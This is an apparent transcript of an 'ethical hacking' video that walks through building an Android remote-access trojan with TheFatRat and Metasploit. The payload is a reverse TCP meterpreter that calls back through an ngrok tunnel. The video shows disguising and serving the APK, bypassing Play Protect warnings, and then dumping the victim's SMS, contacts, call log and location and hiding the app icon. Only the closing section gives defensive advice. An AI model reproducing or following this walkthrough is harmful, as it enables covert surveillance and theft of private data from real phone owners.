This channel does not promote or encourage any illegal activities. All contents provided by this channel is meant for educational purpose only.
What if I told you that right now someone could be watching everything you do in your Android phone? This includes your messages, photos, passwords, social media, even listening to your microphone and watching you through your camera. And the scariest part, you never even know they were there. Hey guys, welcome back to Total Tech, your trusted source for ethical hacking and cybersecurity education. In today's video, we're diving deep into one of the most dangerous threats to Android security, remote access exploitation. If you're new here and want to learn more about cybersecurity and ethical hacking, make sure to like, subscribe, and hit that notification bell so you don't miss out on any future content. And as always, if you have any questions or need any help, please leave me a message in the comments below and I will get back to you. Now, let's understand why Android devices are such attractive targets for attackers. There are over 3 billion active Android device users worldwide. Each one is a powerful computer that contains its user's entire digital life. Banking apps, social media, emails, photos, everything that matters is stored on these devices. But what really makes Android particularly vulnerable is its open nature. See, unlike other mobile operating systems, Android allows installation from unknown sources. And while this flexibility is great for users, it also creates a lot of opportunities for attackers. Think about this. How many times have you installed an app from outside the Play Store? Perhaps it was a game not available in your region, or an app someone shared with you. Each time you do this, you're allowing that app access to your entire digital life. Attackers love to exploit this vulnerability. They create seemingly harmless apps, games, utilities, and security tools. However, hidden deep inside these apps are codes that secretly create a backdoor to your device. And once installed, these malicious apps can access your camera, read your messages, track your location, or even access your banking information. And the most dangerous part, these apps can hide themselves on your phone without leaving an icon, silently running in the background while harvesting your personal information. But don't worry, by the end of this video, I'll show you exactly how these attacks work so you can better protect yourself. Now, let's move over to our lab environment to see these attacks in action. So now that we understand the basics, let's prepare our attack environment. There are two tools that we will need, the Fat Rat and ngrok. Let's start with the Fat Rat. First, let's update our system. Open your terminal and type sudo apt update. This command refreshes our package list from repositories, ensuring that we have access to the latest versions of all tools. After that, run sudo apt upgrade. This command installs the latest updates, keeping our system secure and compatible with new tools. Now for the Fat Rat installation. Open your browser and search for the Fat Rat GitHub. Click the first result from the screetsec repository. This is the official repository which ensures we're getting the legitimate tool. Copy the repository link from either the address bar or by clicking the code button. Back in our terminal, let's clone this repository. Type git clone and paste the URL that we just copied. While this clones, let me explain what makes the Fat Rat so special. The Fat Rat is an exploitation framework that automates the creation of backdoors and payloads, which sets it apart as its ability to create sophisticated payloads that can evade antivirus detection, making it both an extremely powerful and dangerous tool in the right hands. Once cloning is complete, navigate to the repository with cd the Fat Rat and run ls to see the contents. Notice that setup.sh file, that's our installer, but first we need to make it executable. Run chmod +x setup.sh. This command gives the file execution permissions. We'll need root privileges for installation, so run sudo su and enter your Kali Linux password. Now run /setup.sh to start the installation. Watch how it checks for all necessary modules. If you see a prompt about an incorrect version of Metasploit, type yes to install the correct version. The installation process is thorough. It's checking for every required tool and marking them with either check for installed or cross for missing. Don't worry about the missing ones, it will install them automatically. Just sit back and let it work. When prompted about the backdoor factory, choose option 2 for automatic installation. Next, it will ask for a folder path to save your generated payloads. While you could use the default path, let's make it more accessible. Open a new terminal in your documents folder. Run pwd to get the complete path. Copy it and paste it back in the Fat Rat terminal. When asked if you want to run the Fat Rat from anywhere using the Fat Rat command, type Y and press enter. This makes the tool easily accessible from any directory. To verify our installation, make sure you're still in root privileges and type Fat Rat. Watch as it performs one final module check. Press enter when prompted and wait while it starts the PostgreSQL service. Then press enter again at the next prompt. And there it is, the Fat Rat's main menu with all of its options. We'll explore these in details, but first let's install our second crucial tool, ngrok. Before we move forward, let's understand exactly what ngrok is and why we need it. ngrok is a powerful tunneling tool that creates secure tunnels to your local host, which makes it accessible from the internet. For our demonstration, we'll use it to create a connection back to our system. Let's install ngrok. Open your browser and search for ngrok Linux. Click the first result that says download ngrok. On the download page, you'll see Linux selected as your operating system. They provide a simple installation command. Copy it exactly as shown and paste it back in your terminal. Once ngrok is installed, let's verify it. Type ngrok help into your terminal. This shows all available commands. Scroll down and you'll see some sample commands. Let's try the basic one, ngrok http 80. Notice the error? ngrok is telling us we need to do two things. First, we need to sign up for an account, and second, we need to configure our auth token. See those links in the error message? Let's handle them one by one. Hold Control and click the first link. This opens the ngrok signup page in your browser. Once you've created your account, go back to the terminal and click the second link to get your auth token. To configure ngrok with your auth token, run ngrok config add auth token, followed by your token. This links ngrok to your account. Let's test our setup. Try running ngrok http 80 again. See how it starts up without any errors now? But there's still one more crucial step. For our demonstration, we'll be using TCP instead of HTTP. Try running ngrok TCP 4444. You'll notice a different error. ngrok requires payment verification for TCP tunnels. Click the provided link. Similar to the sign-up process, you'll need to enter some information for verification, but don't worry, ngrok won't charge you anything as we're using the free account. ngrok simply requires this verification because TCP tunnels can potentially be misused for hacking. After completing the verification, try ngrok TCP 4444 again. And now it works perfectly. Our environment setup is complete. Both the Fat Rat and ngrok are now ready for our demonstration. Now we're at the main menu of the Fat Rat. Look at all these powerful options before us. We're interested in the first option, create backdoor with MSF Venom. Type 1 and press enter. This brings us to a new menu with multiple options for different operating systems, programming languages, and frameworks. You can create payloads for Windows, Linux, PHP, and more, but today we're focusing on Android. Look at option 3, sign Android Fat Rat APK. Type 3 and press enter. Now it's asking us to set lhost IP. This is a crucial decision point. If you're performing this on your local network, you'd use your Kali Linux machine's local IP address, but we're going beyond local testing. We want to demonstrate how this works over the internet. This is where ngrok comes in. Open the ngrok TCP terminal. Look at that address it generated. We need to copy everything after TCP up to the colon. This is what we use instead of a local IP address. Copy it, switch back to the Fat Rat, and paste it as our lhost. Next is asking for L-port. Again, for local network testing, you typically use port 4444. This is the default port that Metasploit typically uses for many of its operations, but since we're using ngrok, we need to use the port it provided. Copy that number from your ngrok terminal and paste it here. Now it wants a name for the output file. You can name it anything you want. I'm calling mine myrat. Think of this name carefully because in real-world security testing, it should blend in with normal apps. Look at these payload options. We're using TCP, so we want option 3, Android meter preader reverse _ TCP. This payload creates a persistent connection back to our machine through TCP, which gives us powerful control capabilities over the device. The payload creation process has started. This might take a few minutes. The Fat Rat is not just creating the payload, it's also signing it to help bypass some security measures. Look at all these components being generated. Now it's asking if we want to create a resource file for the MSF Venom listener. For now, enter N for no. We'll handle our listener setup manually to better understand the process. Press enter again to return to the main menu. Let's verify our payload was created. Remember when we set up the Fat Rat, we configured it to save files and documents. Open that folder. And there it is. Our myrat.apk is waiting to be deployed. Now comes the critical part, getting this payload onto our target device. In a real-world security assessment, this would involve social engineering, but since we're in a testing environment, we have options. We could use a USB cable, but let me show you a smarter method. Let me show you how to do this completely remotely through a self-made Python server. Right-click in Documents folder and open Terminal here. We'll run the simple yet powerful command, Python 3m HTTP server 90. Let me explain what this does. Python has a built-in HTTP server module. The M flag tells Python to run this module, and we're specifying port 90. This creates a basic web server that shares all files in the current directory. Now switch to your testing device. This will either be an Android emulator or a physical device that you connected to remotely. Open this browser and enter your Kali Linux machine's IP, followed by 90. See how it shows our directory contents? And there it is. Our myrat.apk is waiting to be downloaded. Click on the APK. Notice that warning? File can't be downloaded securely. It's showing two options, discard or keep. This is Android's first line of defense against unknown applications. Click keep. After downloading, try to install it. Look at that prominent warning, Google Play Protect Unsafe App Blocked. This is Google's security system doing its job, detecting potentially harmful applications. Click more details and then install anyway. Once installed, don't open it yet. Click done. We need to set up our listener first. Exit the Python server with Control-C. We don't need it anymore. Back in the FatRat terminal, let's return to the main menu. Type 15 and press enter. Look at option 10, jump to MSF console. Type 10 and press enter. A new terminal window opens, launching the Metasploit framework. This is where the real power comes in. Wait for it to fully load. You'll see the MSF6 prompt. Type clear and press enter. Now we need to set up our handler with use exploit multi-handler. This module is crucial. It's what catches and manages our incoming connection. Think of it as setting up a specialized receiver for our payload. We need to configure the exact same payload that we used in our APK. Type set payload Android meterpreter reverse underscore TCP. To verify our connection, type show options. See how L port is already set to 4444? But look, L host is empty. We need to set it. Type set lhost 0000. This tells Metasploit to listen to all networks and interfaces. This is important when working with external connections like we are. Now comes the moment of truth. Switch to your Android device and open the app. It's asking for permission. Click continue. We want to grant these for our testing. You may see another warning about the app being built for an older version of Android. Click OK to dismiss it. Back to our MSF console terminal. Type run, and there it is. Session established successfully. We now have full control of the Android device. Type help to see the full arsenal at our disposal. Look at all those commands. Let's test some of the most powerful ones. Type sysinfo. Look at what happens. It displays comprehensive system information about the target device. You can see the Android version, architect details, everything a attacker would need to tailor the next move. Type webcam underscore list. This shows all available cameras for the device, front, back, side, and any other camera the device would have access to. Try dump underscore call log. This command extracts the entire call history. Look at the FatRat folder. See how it saves everything there? This folder becomes a treasury of extracted information. Let's grab more data. Type dump underscore contacts. This pulls the entire contact list. Then dump underscore SMS to download all text messages. Want to know where the device is? Type geolocate. This gives the device's current location. Here's something particularly stealthy. Type hide underscore app underscore icon. Watch what happens on the device. The app icon disappears from the app drawer. The application keeps running, but the user can't see it anymore. This is why malicious apps are so dangerous. They can hide their presence while maintaining full access. Now that you understand how devastating these attacks can be, let's talk about protecting yourself and your devices. This isn't just theory. These are practical steps that can save your digital life. First and most crucial, Never install apps from unknown sources. I know it's tempting when you find an app that's not on the Play Store, but this is one of the easiest ways attackers gain access to your device. You know that unknown sources toggle in your security settings? Think of it as the front door to your digital house. Keep it locked. Google Play Protect isn't just an annoying pop-up, it's your first line of defense. When you saw those warnings during our demonstration, that was Play Protect doing its job. Never bypass these warnings on your personal device. The few seconds it takes to find a legitimate app on the Play Store could save you from months of privacy nightmares. Keep your Android system updated because every security patch matters. Attackers often exploit known vulnerabilities that have already been patched in newer versions. Here's something many people overlook. Make sure you check your installed apps regularly. Go to Settings, then Apps. Look for anything you don't remember installing. Pay special attention to apps with weird names or symbols that you don't recognize. If something looks suspicious, remove it immediately. Watch your app permissions carefully. An app asking for permissions it shouldn't need is a massive red flag. Why would a calculator need to access your camera? Why does a game need to read your SMS messages? These unnecessary permissions are often how malicious apps maintain access to your device. Use a reliable mobile security solution. The built-in Play Protect is good, but additional security can provide extra layers of protection. Look for solutions that offer real-time scanning and app behavior monitoring. For tech-savvy users, consider using an app like Network Monitor Mini. It shows you all active network connections on your device. If you see suspicious outbound connections, especially to unknown addresses, investigate it immediately. Monitor your battery usage. Malicious apps often drain battery by running constantly in the background. If your battery life suddenly decreases or your phone feels hot when you're not using it, check your battery usage statistics for suspicious activity. Lastly, here's a pro tip. Use Android's built-in safe mode when you suspect something's wrong with your phone. Reboot your device while holding the power button and you'll see an option for safe mode. This prevents third-party apps from running, making it easier to identify and remove malicious apps. Remember, the knowledge shared in this video carries great responsibility. Use it to protect yourself and others, never for malicious purposes. Understanding these attacks is crucial for defense. However, implementing them without proper authorization is both dangerous and unethical. If you found this information useful, make sure to like, subscribe, and hit that notification bell so you don't miss out on any future content. And again, if you have any questions or need any help, please leave me a message in the comments below and I will get back to you. Thanks for stopping by, and I will see you in the next video.